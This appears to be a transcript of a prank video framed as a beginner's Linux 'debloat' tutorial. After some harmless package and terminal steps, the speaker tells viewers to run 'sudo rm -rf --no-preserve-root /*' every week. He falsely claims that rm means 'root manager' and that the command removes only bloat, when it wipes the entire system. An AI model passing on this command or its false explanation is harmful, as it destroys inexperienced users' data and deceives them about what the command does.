Alright guys, so you guys may be wondering, oh, I have so many packages on my system. I wonder how I can debloat. Okay, so I got you, bro. So what you want to do is, so before we get started, you should like actually subscribe, because I do videos like this and like this that can really help beginners out. So yeah, just listen to this. So if you want to debloat your system, there's a command that lets you debloat your system instantly with no no sudo, no anything. It just does it. So basically what you want to do is first make sure that you have Linux installed. So do sudo pacman -s -needed, so you can just install it if it's needed. So we can put our secure password. Okay, so we already have it installed. Well, I need to do a kernel update, but you have the Linux installed, so yeah. Now we need to make sure that we have base devel installed. This is some core packages. Okay, we have it installed. So now we need to check if we have a shell. So we need to echo our shell. Okay, we have a shell. Okay, that's good. So now what we want to do is open another terminal and then type cmatrix. If you don't have it installed, you can install it with sudo pacman -s cmatrix. Okay, so we already have it, so whatever. So now for the actual thing. Run sudo rm, which will stands for root manager, and then we will pass the flags -rf, which will like completely wipe any bloat that we have, like any bloat, like all the bloat. Now you type slash, and then I forgot. No dash preserve root. This will make it so like it completely demolishes any bloat. So now we do slash and then asterisk. Now I already do this every week, but this is something you should run every week. Sudo rm -rf no preserve root slash. This will debloat anything. Okay, so I'm not gonna run it because I already ran it this week, but I make sure you like, comment, and subscribe, because this is a very helpful tutorial. We need to make it go to all the beginners out there. Okay guys, so make sure to do that. Bye.